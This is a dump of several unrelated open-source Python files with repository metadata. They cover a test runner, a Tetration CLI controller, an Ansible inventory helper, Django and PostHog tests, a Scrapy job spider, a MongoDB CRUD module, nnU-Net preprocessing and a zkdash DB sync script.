{}:{}'.format(BOLD[1], testdir, BOLD[0])) print('============\n') combined_logs_args = [sys.executable, os.path.join(tests_dir, 'combine_logs.py'), testdir] if BOLD[0]: combined_logs_args += ['--color'] combined_logs, _ = subprocess.Popen(combined_logs_args, universal_newlines=True, stdout=subprocess.PIPE).communicate() print("\n".join(deque(combined_logs.splitlines(), combined_logs_len))) if failfast: logging.debug("Early exiting after test failure") break print_results(test_results, max_len_name, (int(time.time() - start_time))) if coverage: coverage.report_rpc_coverage() logging.debug("Cleaning up coverage data") coverage.cleanup() # Clear up the temp directory if all subdirectories are gone if not os.listdir(tmpdir): os.rmdir(tmpdir) all_passed = all(map(lambda test_result: test_result.was_successful, test_results)) # This will be a no-op unless failfast is True in which case there may be dangling # processes which need to be killed. job_queue.kill_and_join() sys.exit(not all_passed) def print_results(test_results, max_len_name, runtime): results = "\n" + BOLD[1] + "%s | %s | %s\n\n" % ("TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0] test_results.sort(key=TestResult.sort_key) all_passed = True time_sum = 0 for test_result in test_results: all_passed = all_passed and test_result.was_successful time_sum += test_result.time test_result.padding = max_len_name results += str(test_result) status = TICK + "Passed" if all_passed else CROSS + "Failed" if not all_passed: results += RED[1] results += BOLD[1] + "\n%s | %s | %s s (accumulated) \n" % ("ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0] if not all_passed: results += RED[0] results += "Runtime: %s s\n" % (runtime) print(results) class TestHandler: """ Trigger the test scripts passed in via the list. """ def __init__(self, *, num_tests_parallel, tests_dir, tmpdir, test_list, flags, timeout_duration): assert num_tests_parallel >= 1 self.num_jobs = num_tests_parallel self.tests_dir = tests_dir self.tmpdir = tmpdir self.timeout_duration = timeout_duration self.test_list = test_list self.flags = flags self.num_running = 0 self.jobs = [] def get_next(self): while self.num_running < self.num_jobs and self.test_list: # Add tests self.num_running += 1 test = self.test_list.pop(0) portseed = len(self.test_list) portseed_arg = ["--portseed={}".format(portseed)] log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16) log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16) test_argv = test.split() testdir = "{}/{}_{}".format(self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed) tmpdir_arg = ["--tmpdir={}".format(testdir)] self.jobs.append((test, time.time(), subprocess.Popen([sys.executable, self.tests_dir + test_argv[0]] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg, universal_newlines=True, stdout=log_stdout, stderr=log_stderr), testdir, log_stdout, log_stderr)) if not self.jobs: raise IndexError('pop from empty list') dot_count = 0 while True: # Return first proc that finishes time.sleep(.5) for job in self.jobs: (name, start_time, proc, testdir, log_out, log_err) = job if int(time.time() - start_time) > self.timeout_duration: # In travis, timeout individual tests (to stop tests hanging and not providing useful output). proc.send_signal(signal.SIGINT) if proc.poll() is not None: log_out.seek(0), log_err.seek(0) [stdout, stderr] = [log_file.read().decode('utf-8') for log_file in (log_out, log_err)] log_out.close(), log_err.close() if proc.returncode == TEST_EXIT_PASSED and stderr == "": status = "Passed" elif proc.returncode == TEST_EXIT_SKIPPED: status = "Skipped" else: status = "Failed" self.num_running -= 1 self.jobs.remove(job) clearline = '\r' + (' ' * dot_count) + '\r' print(clearline, end='', flush=True) dot_count = 0 return TestResult(name, status, int(time.time() - start_time)), testdir, stdout, stderr print('.', end='', flush=True) dot_count += 1 def kill_and_join(self): """Send SIGKILL to all jobs and block until all have ended.""" procs = [i[2] for i in self.jobs] for proc in procs: proc.kill() for proc in procs: proc.wait() class TestResult(): def __init__(self, name, status, time): self.name = name self.status = status self.time = time self.padding = 0 def sort_key(self): if self.status == "Passed": return 0, self.name.lower() elif self.status == "Failed": return 2, self.name.lower() elif self.status == "Skipped": return 1, self.name.lower() def __repr__(self): if self.status == "Passed": color = GREEN glyph = TICK elif self.status == "Failed": color = RED glyph = CROSS elif self.status == "Skipped": color = GREY glyph = CIRCLE return color[1] + "%s | %s%s | %s s\n" % (self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0] @property def was_successful(self): return self.status != "Failed" def check_script_prefixes(): """Check that test scripts start with one of the allowed name prefixes.""" good_prefixes_re = re.compile("(example|feature|interface|mempool|mining|p2p|rpc|wallet|tool)_") bad_script_names = [script for script in ALL_SCRIPTS if good_prefixes_re.match(script) is None] if bad_script_names: print("%sERROR:%s %d tests not meeting naming conventions:" % (BOLD[1], BOLD[0], len(bad_script_names))) print(" %s" % ("\n ".join(sorted(bad_script_names)))) raise AssertionError("Some tests are not following naming convention!") def check_script_list(*, src_dir, fail_on_warn): """Check scripts directory. Check that there are no scripts in the functional tests directory which are not being run by pull-tester.py.""" script_dir = src_dir + '/test/functional/' python_files = set([test_file for test_file in os.listdir(script_dir) if test_file.endswith(".py")]) missed_tests = list(python_files - set(map(lambda x: x.split()[0], ALL_SCRIPTS + NON_SCRIPTS))) if len(missed_tests) != 0: print("%sWARNING!%s The following scripts are not being run: %s. Check the test lists in test_runner.py." % (BOLD[1], BOLD[0], str(missed_tests))) if fail_on_warn: # On travis this warning is an error to prevent merging incomplete commits into master sys.exit(1) class RPCCoverage(): """ Coverage reporting utilities for test_runner. Coverage calculation works by having each test script subprocess write coverage files into a particular directory. These files contain the RPC commands invoked during testing, as well as a complete listing of RPC commands per `grovcoin-cli help` (`rpc_interface.txt`). After all tests complete, the commands run are combined and diff'd against the complete list to calculate uncovered RPC commands. See also: test/functional/test_framework/coverage.py """ def __init__(self): self.dir = tempfile.mkdtemp(prefix="coverage") self.flag = '--coveragedir=%s' % self.dir def report_rpc_coverage(self): """ Print out RPC commands that were unexercised by tests. """ uncovered = self._get_uncovered_rpc_commands() if uncovered: print("Uncovered RPC commands:") print("".join((" - %s\n" % command) for command in sorted(uncovered))) else: print("All RPC commands covered.") def cleanup(self): return shutil.rmtree(self.dir) def _get_uncovered_rpc_commands(self): """ Return a set of currently untested RPC commands. """ # This is shared from `test/functional/test-framework/coverage.py` reference_filename = 'rpc_interface.txt' coverage_file_prefix = 'coverage.' coverage_ref_filename = os.path.join(self.dir, reference_filename) coverage_filenames = set() all_cmds = set() covered_cmds = set() if not os.path.isfile(coverage_ref_filename): raise RuntimeError("No coverage reference found") with open(coverage_ref_filename, 'r', encoding="utf8") as coverage_ref_file: all_cmds.update([line.strip() for line in coverage_ref_file.readlines()]) for root, _, files in os.walk(self.dir): for filename in files: if filename.startswith(coverage_file_prefix): coverage_filenames.add(os.path.join(root, filename)) for filename in coverage_filenames: with open(filename, 'r', encoding="utf8") as coverage_file: covered_cmds.update([line.strip() for line in coverage_file.readlines()]) return all_cmds - covered_cmds if __name__ == '__main__': main()
38.892473
205
0.632331
0ecd8c994118cadaf94a9df739e370cc033a4278
1,124
py
Python
tetrationcli/controllers/applications.py
jumolinas/tetrationcli
41605403734ab1e2256b01f438bf9172288fa912
[ "MIT" ]
4
2018-11-28T13:37:59.000Z
2019-03-29T03:02:27.000Z
tetrationcli/controllers/applications.py
jumolinas/tetrationcli
41605403734ab1e2256b01f438bf9172288fa912
[ "MIT" ]
5
2018-12-07T13:06:35.000Z
2019-12-13T15:32:51.000Z
tetrationcli/controllers/applications.py
jumolinas/tetrationcli
41605403734ab1e2256b01f438bf9172288fa912
[ "MIT" ]
null
null
null
from cement import ex from .tet_controller import TetController import json class Applications(TetController): class Meta: label = 'applications' stacked_type = 'nested' help= 'Interact with ADM Application from Tetration Cluster' @ex(help='list applications', arguments=[ ]) def list(self): """ Return the list of all the applications """ response = self.tetration().get('/applications') content = json.loads(response.content.decode("utf-8")) self.app.log.debug('{0} - {1}'.format(response.status_code, response.content.decode('utf-8'))) if response.status_code == 403: self.app.log.error('{0}Request "app_policy_management" permissions'.format(response.content.decode('utf-8'))) return headers = ['Application ID', 'Name', 'Scope ID'] data_list = [[x['id'], x['name'], x['app_scope_id']] for x in content ] self.app.render(data_list, headers=headers)
33.058824
121
0.564057
b108f4c8311348698a4b16524190d4e54ef654d2
2,572
py
Python
extra/up_inv.py
HeyLazySunnyKid/HeyCheckYourRights
acecff3a41049bc85a88a2d55664afe44e1b4757
[ "MIT" ]
null
null
null
extra/up_inv.py
HeyLazySunnyKid/HeyCheckYourRights
acecff3a41049bc85a88a2d55664afe44e1b4757
[ "MIT" ]
null
null
null
extra/up_inv.py
HeyLazySunnyKid/HeyCheckYourRights
acecff3a41049bc85a88a2d55664afe44e1b4757
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 import sys import re import shutil import os """ Вспомогательный скрипт для переноса хоста из одной инвентори группы в другую в рамках сортировки хостов. Input: up_inv.py <inventory> <hostname> <ping> <setup> <sudo> <inventory> - path to inventory file <hostname> - checked hostname <ping> - ping is ok (boolean) <setup> - ansible setup is ok? (boolean) <sudo> - ansible become is ok? (boolean) """ def move_host(inv, host, block): mode = 'r' if os.path.exists(inv) else 'w+' with open(inv, mode) as r: with open('tempfile', 'w') as w: cur_block = None host_not_found = True host_writed = False file_changed = False for line in r: block_match = re.match(r'\[(.*)\]', line) if block_match: # Если полностью прошли нужный блок и не нашли хост то # добавляем в конец блока if cur_block == block and host_not_found: w.write(host+'\n') host_writed = True file_changed = True cur_block = block_match.group(1) w.write(line) continue host_match = re.match(host, line) if host_match: if cur_block == block: host_not_found = False host_writed = True elif cur_block in ['unreachable', 'ping', 'reachable', 'best']: # Не вставлять хост если не тот блок из зарезирвированных file_changed = True continue w.write(line) if not host_writed: # Если прошли весь файл и не нашли нужный блок, то нужно его # добавить if cur_block != block: w.write('['+block+']\n') w.write(host+'\n') host_writed = True file_changed = True shutil.move('tempfile', inv) if file_changed: print('changed') def main(): # print(sys.argv) inv = sys.argv[1] host = sys.argv[2] false_list = ['False', 'false', 'f'] if sys.argv[3] in false_list: block = 'unreachable' elif sys.argv[4] in false_list: block = 'ping' elif sys.argv[5] in false_list: block = 'reachable' else: block = 'best' move_host(inv, host, block) if __name__ == "__main__": main()
27.655914
83
0.512442
597f68e74e0d296d5114aab7ec07e3239539f6ea
2,609
py
Python
djaludir/core/tests/sql/test_address.py
carthagecollege/django-djaludir
126735000efb69d7184aec9591a96667070f1870
[ "BSD-3-Clause" ]
null
null
null
djaludir/core/tests/sql/test_address.py
carthagecollege/django-djaludir
126735000efb69d7184aec9591a96667070f1870
[ "BSD-3-Clause" ]
2
2020-06-05T19:30:19.000Z
2021-06-10T20:54:38.000Z
djaludir/core/tests/sql/test_address.py
carthagecollege/django-djaludir
126735000efb69d7184aec9591a96667070f1870
[ "BSD-3-Clause" ]
null
null
null
from django.conf import settings from django.test import TestCase from djaludir.core.sql import HOMEADDRESS_TEMP, WORKADDRESS_TEMP from djtools.utils.logging import seperator from djzbar.utils.informix import do_sql class ManagerAddressTestCase(TestCase): def setUp(self): self.debug = settings.INFORMIX_DEBUG self.earl = settings.INFORMIX_EARL self.cid = settings.TEST_USER_COLLEGE_ID self.cid_null = 666 def test_home_address_temp(self): print("\n") print("test home address select statement from temp table") print(seperator()) sql = HOMEADDRESS_TEMP(cid = self.cid) if settings.DEBUG: print(sql) else: print("use the --debug-mode flag to print HOMEADDRESS_TEMP SQL") homeaddress = do_sql(sql, self.debug, self.earl).fetchall() print(homeaddress) self.assertGreaterEqual(len(homeaddress), 1) def test_home_address_invalid(self): print("\n") print( """ test home address select statement from temp table with invalid college ID """ ) print(seperator()) sql = HOMEADDRESS_TEMP(cid = self.cid_null) if settings.DEBUG: print(sql) else: print("use the --debug-mode flag to print HOMEADDRESS_TEMP SQL") homeaddress = do_sql(sql, self.debug, self.earl).fetchall() print(homeaddress) self.assertEqual(len(homeaddress), 0) def test_work_address_temp(self): print("\n") print("test work address select statement from temp table") print(seperator()) sql = WORKADDRESS_TEMP(cid = self.cid) if settings.DEBUG: print(sql) else: print("use the --debug-mode flag to print WORKADDRESS_TEMP SQL") workaddress = do_sql(sql, self.debug, self.earl).fetchall() print(workaddress) self.assertGreaterEqual(len(workaddress), 1) def test_work_address_invalid(self): print("\n") print( """ test work address select statement from temp table with invalid college ID """ ) print(seperator()) sql = WORKADDRESS_TEMP(cid = self.cid_null) if settings.DEBUG: print(sql) else: print("use the --debug-mode flag to print WORKADDRESS_TEMP SQL") workaddress = do_sql(sql, self.debug, self.earl).fetchall() print(workaddress) self.assertEqual(len(workaddress), 0)
25.330097
76
0.609046
d2a2c81039574c4e8e166844aeb70fb9e2797f9c
1,506
py
Python
TechLurker/scripts/my_scraper/my_scraper/spiders/pyjob_detail_spider.py
han8909227/python_mid_project
6319f694de070860f814d0b9dfc04afe060134fb
[ "MIT" ]
null
null
null
TechLurker/scripts/my_scraper/my_scraper/spiders/pyjob_detail_spider.py
han8909227/python_mid_project
6319f694de070860f814d0b9dfc04afe060134fb
[ "MIT" ]
3
2019-12-26T16:39:11.000Z
2021-03-31T18:40:46.000Z
TechLurker/scripts/my_scraper/my_scraper/spiders/pyjob_detail_spider.py
han8909227/python_mid_project
6319f694de070860f814d0b9dfc04afe060134fb
[ "MIT" ]
2
2017-11-17T01:19:38.000Z
2018-09-06T18:43:40.000Z
import scrapy from scrapy import Request from TechLurker.scripts.my_scraper.my_scraper.items import RecruitItem class PyjobSpider_detail(scrapy.Spider): name = "pyjobd" allowed_domains = ["python.org"] start_urls = ["https://www.python.org/jobs/"] def parse(self, response): jobs = response.xpath('//ol/li') for job in jobs: relative_url = job.xpath('h2/span/a/@href').extract_first() absolute_url = response.urljoin(relative_url) title = job.xpath('h2/span/a/text()').extract()[0] address = job.xpath('h2/span/a/text()').extract()[1] job_type = job.xpath('span/a/text()').extract() # company = job.xpath('h2/span/text()').extract() yield Request(absolute_url, callback=self.parse_page, meta={'URL': absolute_url, 'Title': title, 'Loc': address, 'JobType': job_type}) relative_next_url = response.xpath('//a[contains(@href, "?page=")]/@href')[-1].extract() absolute_next_url = "https://www.python.org/jobs/" + relative_next_url yield Request(absolute_next_url, callback=self.parse) def parse_page(self, response): item = RecruitItem() item['url'] = response.meta.get('URL') item['title'] = response.meta.get('Title') item['loc'] = response.meta.get('Loc') item['job_type'] = response.meta.get('JobType') item['descrip'] = response.xpath('//div[@class="job-description"]/p/text()').extract() yield item
45.636364
146
0.626826
2acd9770cb62478b5a7c4b09ca9b29eae334cd84
1,614
py
Python
backend/db.py
LucioGrimaldi/SimpleFastPythonAPISample
f880d8e9c772c3f09d53ea34ea3478fbaa72da8a
[ "Apache-2.0" ]
null
null
null
backend/db.py
LucioGrimaldi/SimpleFastPythonAPISample
f880d8e9c772c3f09d53ea34ea3478fbaa72da8a
[ "Apache-2.0" ]
null
null
null
backend/db.py
LucioGrimaldi/SimpleFastPythonAPISample
f880d8e9c772c3f09d53ea34ea3478fbaa72da8a
[ "Apache-2.0" ]
null
null
null
from typing import Collection from model import Employee import motor.motor_asyncio #MongoDB driver client = motor.motor_asyncio.AsyncIOMotorClient('mongodb://localhost:27017') database = client.Employees collection = database.employees async def get_employees_by_key_value(key, value): employees = [] cursor = collection.find({key:value}) async for document in cursor: employees.append(Employee(**document)) return employees async def get_all_employees(): employees = [] cursor = collection.find({}) async for document in cursor: employees.append(Employee(**document)) return employees async def create_employee(employee): await collection.insert_one(employee) return employee async def update_employee_phone_number(id, phone_number): await collection.update_one({'id':id}, {'$set': {'phone_number':phone_number}}) document = await collection.find_one({'phone_number':phone_number}) return document async def update_employee_address(id, new_address): await collection.update_one({'id':id}, {'$set': {'address':new_address}}) document = await collection.find_one({'address':new_address}) return document async def remove_employee_by_name(name): result = await collection.delete_one({'name':name}) if result.deleted_count == 1: return True else: return False async def remove_employee_by_id(id): result = await collection.delete_one({'id':id}) if result.deleted_count == 1: return True else: return False
31.038462
76
0.69145
d679487e365d01e5ff07163cbbe23ccd19a0bd2e
7,068
py
Python
nnunet/experiment_planning/nnUNet_plan_and_preprocess.py
Jiawei-Yang/TumorCP
6053c75642fcbc0fb0424320ab3d758f24883b0e
[ "Apache-2.0" ]
12
2021-07-22T15:08:13.000Z
2022-03-10T08:15:56.000Z
nnunet/experiment_planning/nnUNet_plan_and_preprocess.py
Jiawei-Yang/TumorCP
6053c75642fcbc0fb0424320ab3d758f24883b0e
[ "Apache-2.0" ]
null
null
null
nnunet/experiment_planning/nnUNet_plan_and_preprocess.py
Jiawei-Yang/TumorCP
6053c75642fcbc0fb0424320ab3d758f24883b0e
[ "Apache-2.0" ]
3
2021-11-26T06:26:24.000Z
2022-02-14T01:23:44.000Z
# Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import sys sys.path.append('..') sys.path.append('../..') import nnunet from batchgenerators.utilities.file_and_folder_operations import * from nnunet.experiment_planning.DatasetAnalyzer import DatasetAnalyzer from nnunet.experiment_planning.utils import crop from nnunet.paths import * import shutil from nnunet.utilities.task_name_id_conversion import convert_id_to_task_name from nnunet.preprocessing.sanity_checks import verify_dataset_integrity from nnunet.training.model_restore import recursive_find_python_class def main(): import argparse parser = argparse.ArgumentParser() parser.add_argument("-t", "--task_ids", nargs="+", help="List of integers belonging to the task ids you wish to run" " experiment planning and preprocessing for. Each of these " "ids must, have a matching folder 'TaskXXX_' in the raw " "data folder") parser.add_argument("-pl3d", "--planner3d", type=str, default="ExperimentPlanner3D_v21", help="Name of the ExperimentPlanner class for the full resolution 3D U-Net and U-Net cascade. " "Default is ExperimentPlanner3D_v21. Can be 'None', in which case these U-Nets will not be " "configured") parser.add_argument("-pl2d", "--planner2d", type=str, default="ExperimentPlanner2D_v21", help="Name of the ExperimentPlanner class for the 2D U-Net. Default is ExperimentPlanner2D_v21. " "Can be 'None', in which case this U-Net will not be configured") parser.add_argument("-no_pp", action="store_true", help="Set this flag if you dont want to run the preprocessing. If this is set then this script " "will only run the experiment planning and create the plans file") parser.add_argument("-tl", type=int, required=False, default=8, help="Number of processes used for preprocessing the low resolution data for the 3D low " "resolution U-Net. This can be larger than -tf. Don't overdo it or you will run out of " "RAM") parser.add_argument("-tf", type=int, required=False, default=8, help="Number of processes used for preprocessing the full resolution data of the 2D U-Net and " "3D U-Net. Don't overdo it or you will run out of RAM") parser.add_argument("--verify_dataset_integrity", required=False, default=False, action="store_true", help="set this flag to check the dataset integrity. This is useful and should be done once for " "each dataset!") args = parser.parse_args() task_ids = args.task_ids dont_run_preprocessing = args.no_pp tl = args.tl tf = args.tf planner_name3d = args.planner3d planner_name2d = args.planner2d if planner_name3d == "None": planner_name3d = None if planner_name2d == "None": planner_name2d = None # we need raw data tasks = [] for i in task_ids: i = int(i) task_name = convert_id_to_task_name(i) if args.verify_dataset_integrity: verify_dataset_integrity(join(nnUNet_raw_data, task_name)) crop(task_name, False, tf) tasks.append(task_name) search_in = join(nnunet.__path__[0], "experiment_planning") if planner_name3d is not None: planner_3d = recursive_find_python_class([search_in], planner_name3d, current_module="nnunet.experiment_planning") if planner_3d is None: raise RuntimeError("Could not find the Planner class %s. Make sure it is located somewhere in " "nnunet.experiment_planning" % planner_name3d) else: planner_3d = None if planner_name2d is not None: planner_2d = recursive_find_python_class([search_in], planner_name2d, current_module="nnunet.experiment_planning") if planner_2d is None: raise RuntimeError("Could not find the Planner class %s. Make sure it is located somewhere in " "nnunet.experiment_planning" % planner_name2d) else: planner_2d = None for t in tasks: print("\n\n\n", t) cropped_out_dir = os.path.join(nnUNet_cropped_data, t) preprocessing_output_dir_this_task = os.path.join(preprocessing_output_dir, t) #splitted_4d_output_dir_task = os.path.join(nnUNet_raw_data, t) #lists, modalities = create_lists_from_splitted_dataset(splitted_4d_output_dir_task) # we need to figure out if we need the intensity propoerties. We collect them only if one of the modalities is CT dataset_json = load_json(join(cropped_out_dir, 'dataset.json')) modalities = list(dataset_json["modality"].values()) collect_intensityproperties = True if (("CT" in modalities) or ("ct" in modalities)) else False dataset_analyzer = DatasetAnalyzer(cropped_out_dir, overwrite=False, num_processes=tf) # this class creates the fingerprint _ = dataset_analyzer.analyze_dataset(collect_intensityproperties) # this will write output files that will be used by the ExperimentPlanner maybe_mkdir_p(preprocessing_output_dir_this_task) shutil.copy(join(cropped_out_dir, "dataset_properties.pkl"), preprocessing_output_dir_this_task) shutil.copy(join(nnUNet_raw_data, t, "dataset.json"), preprocessing_output_dir_this_task) threads = (tl, tf) print("number of threads: ", threads, "\n") if planner_3d is not None: exp_planner = planner_3d(cropped_out_dir, preprocessing_output_dir_this_task) exp_planner.plan_experiment() if not dont_run_preprocessing: # double negative, yooo exp_planner.run_preprocessing(threads) if planner_2d is not None: exp_planner = planner_2d(cropped_out_dir, preprocessing_output_dir_this_task) exp_planner.plan_experiment() if not dont_run_preprocessing: # double negative, yooo exp_planner.run_preprocessing(threads) if __name__ == "__main__": main()
49.426573
148
0.664261
8ec9f0df25d86c7a24a57c648be6eb76f416443d
1,757
py
Python
bin/syncdb.py
srvz/zkdash
f705c72983694bb6437cb2c2e2cdb72122d151d1
[ "Apache-2.0" ]
null
null
null
bin/syncdb.py
srvz/zkdash
f705c72983694bb6437cb2c2e2cdb72122d151d1
[ "Apache-2.0" ]
null
null
null
bin/syncdb.py
srvz/zkdash
f705c72983694bb6437cb2c2e2cdb72122d151d1
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' Copyright (c) 2014,掌阅科技 All rights reserved. 摘 要: syncdb.py 创 建 者: zhuangshixiong 创建日期: 2015-10-10 ''' # pylint: disable=import-error, unused-variable, protected-access import sys import os import pkgutil sys.path.append(os.path.dirname(os.path.split(os.path.realpath(__file__))[0])) import model.db from model.db.base import ZKDASH_DB from lib.utils import find_subclasses def sync_db(): """sync db """ # firstly, import all modules of model.db package prefix = model.db.__name__ + "." for importer, modname, ispkg in pkgutil.iter_modules(model.db.__path__, prefix): __import__(modname) # then, find all subclasses of WARSHIP_DB.Model models = find_subclasses(ZKDASH_DB.Model) for mod in models: if mod.table_exists(): print "table exists: %s, continue!" % mod._meta.db_table continue mod.create_table() print "created table: %s" % mod._meta.db_table def reset_db(): """reset db """ # firstly, import all modules of model.db package prefix = model.db.__name__ + "." for importer, modname, ispkg in pkgutil.iter_modules(model.db.__path__, prefix): __import__(modname) # then, find all subclasses of WARSHIP_DB.Model models = find_subclasses(ZKDASH_DB.Model) for mod in models: if mod.table_exists(): print "table exists: %s, drop it!" % mod._meta.db_table mod.drop_table() mod.create_table() print "created table: %s" % mod._meta.db_table if __name__ == '__main__': args = sys.argv cmd = None if len(args) > 1: cmd = args[1] if cmd == 'reset_db': reset_db() else: sync_db()
26.223881
84
0.642573
a909c9d21100ad59c91ca572650b303e147a49c5
426
py
Python
test_scripts/stop_stream.py
luozh05/Doc
3471a9c8578d6530abf5c3ee3100488b0dc1e447
[ "Apache-2.0" ]
null
null
null
test_scripts/stop_stream.py
luozh05/Doc
3471a9c8578d6530abf5c3ee3100488b0dc1e447
[ "Apache-2.0" ]
null
null
null
test_scripts/stop_stream.py
luozh05/Doc
3471a9c8578d6530abf5c3ee3100488b0dc1e447
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python import socket import sys import json import json_over_tcp from json_over_tcp import send_and_receive_msg if __name__ == '__main__': #test start stream:right input, case 0 cmd = {} cmd["cmd-stop-stream"] = "NULL" cmd_string = json.dumps(cmd) result = send_and_receive_msg(cmd_string) if result == False: print "case 0 failed!" exit() print "case 0 succeed!"
22.421053
46
0.673709
637ad35cbb18e683a7236f25616659173215035b
4,366
py
Python
ee/tasks/test/test_send_license_usage.py
dorucioclea/posthog
a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a
[ "MIT" ]
7,409
2020-02-09T23:18:10.000Z
2022-03-31T22:36:25.000Z
ee/tasks/test/test_send_license_usage.py
dorucioclea/posthog
a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a
[ "MIT" ]
5,709
2020-02-09T23:26:13.000Z
2022-03-31T20:20:01.000Z
ee/tasks/test/test_send_license_usage.py
dorucioclea/posthog
a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a
[ "MIT" ]
647
2020-02-13T17:50:55.000Z
2022-03-31T11:24:19.000Z
from unittest.mock import ANY, patch from uuid import uuid4 from freezegun import freeze_time from ee.api.test.base import LicensedTestMixin from ee.clickhouse.models.event import create_event from ee.clickhouse.util import ClickhouseDestroyTablesMixin from ee.models.license import License from ee.tasks.send_license_usage import send_license_usage from posthog.models import organization from posthog.models.team import Team from posthog.test.base import APIBaseTest def _create_event(**kwargs): kwargs.update({"event_uuid": uuid4()}) create_event(**kwargs) class SendLicenseUsageTest(LicensedTestMixin, ClickhouseDestroyTablesMixin, APIBaseTest): @freeze_time("2021-10-10T23:01:00Z") @patch("posthoganalytics.capture") @patch("requests.post") def test_send_license_usage(self, mock_post, mock_capture): team2 = Team.objects.create(organization=self.organization) _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-08T14:01:01Z") _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T12:01:01Z") _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T13:01:01Z") _create_event( event="$$internal_metrics_shouldnt_be_billed", team=self.team, distinct_id=1, timestamp="2021-10-09T13:01:01Z", ) _create_event(event="$pageview", team=team2, distinct_id=1, timestamp="2021-10-09T14:01:01Z") _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-10T14:01:01Z") send_license_usage() mock_post.assert_called_once_with( "https://license.posthog.com/licenses/usage", data={"date": "2021-10-09", "key": self.license.key, "events_count": 3}, ) mock_capture.assert_called_once_with( self.user.distinct_id, "send license usage data", {"date": "2021-10-09", "events_count": 3, "license_keys": ["enterprise"], "organization_name": "Test"}, groups={"instance": ANY, "organization": str(self.organization.id)}, ) @freeze_time("2021-10-10T23:01:00Z") @patch("posthoganalytics.capture") @patch("ee.tasks.send_license_usage.sync_execute", side_effect=Exception()) def test_send_license_error(self, mock_post, mock_capture): team2 = Team.objects.create(organization=self.organization) _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-08T14:01:01Z") _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T12:01:01Z") _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T13:01:01Z") _create_event( event="$$internal_metrics_shouldnt_be_billed", team=self.team, distinct_id=1, timestamp="2021-10-09T13:01:01Z", ) _create_event(event="$pageview", team=team2, distinct_id=1, timestamp="2021-10-09T14:01:01Z") _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-10T14:01:01Z") send_license_usage() mock_capture.assert_called_once_with( self.user.distinct_id, "send license usage data error", {"error": "", "date": "2021-10-09", "organization_name": "Test"}, groups={"instance": ANY, "organization": str(self.organization.id)}, ) class SendLicenseUsageNoLicenseTest(APIBaseTest): @freeze_time("2021-10-10T23:01:00Z") @patch("requests.post") def test_no_license(self, mock_post): # Same test, we just don't include the LicensedTestMixin so no license _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-08T14:01:01Z") _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T12:01:01Z") _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T13:01:01Z") _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-09T14:01:01Z") _create_event(event="$pageview", team=self.team, distinct_id=1, timestamp="2021-10-10T14:01:01Z") send_license_usage() self.assertEqual(mock_post.call_count, 0)
47.978022
115
0.688044
1d83a31a5e2e08ae1de385158bc4b910ae01354b
1,091
py
Python
CustomUsers/migrations/0001_initial.py
PopaGabriel/Food-Ecommerce-Site
7f7cde94939f02f13df5afa865cddc72981481e2
[ "MIT" ]
1
2021-08-12T08:46:56.000Z
2021-08-12T08:46:56.000Z
CustomUsers/migrations/0001_initial.py
PopaGabriel/Food-Ecommerce-Site
7f7cde94939f02f13df5afa865cddc72981481e2
[ "MIT" ]
null
null
null
CustomUsers/migrations/0001_initial.py
PopaGabriel/Food-Ecommerce-Site
7f7cde94939f02f13df5afa865cddc72981481e2
[ "MIT" ]
null
null
null
# Generated by Django 3.2.5 on 2021-09-03 15:19 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='BaseCustomUser', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('password', models.CharField(max_length=128, verbose_name='password')), ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')), ('email', models.EmailField(max_length=255, unique=True)), ('username', models.CharField(max_length=255)), ('cnp', models.CharField(max_length=15)), ('is_active', models.BooleanField(default=True)), ('staff', models.BooleanField(default=False)), ('admin', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), ]
34.09375
117
0.567369
926ecc756213f4098aa8d295452f30fff7851a68
993
py
Python
image.py
Jax-Carstensen/Battleship
aeee90ad0d27f8a4a19047716db35ca31a7dc4ab
[ "MIT" ]
null
null
null
image.py
Jax-Carstensen/Battleship
aeee90ad0d27f8a4a19047716db35ca31a7dc4ab
[ "MIT" ]
null
null
null
image.py
Jax-Carstensen/Battleship
aeee90ad0d27f8a4a19047716db35ca31a7dc4ab
[ "MIT" ]
null
null
null
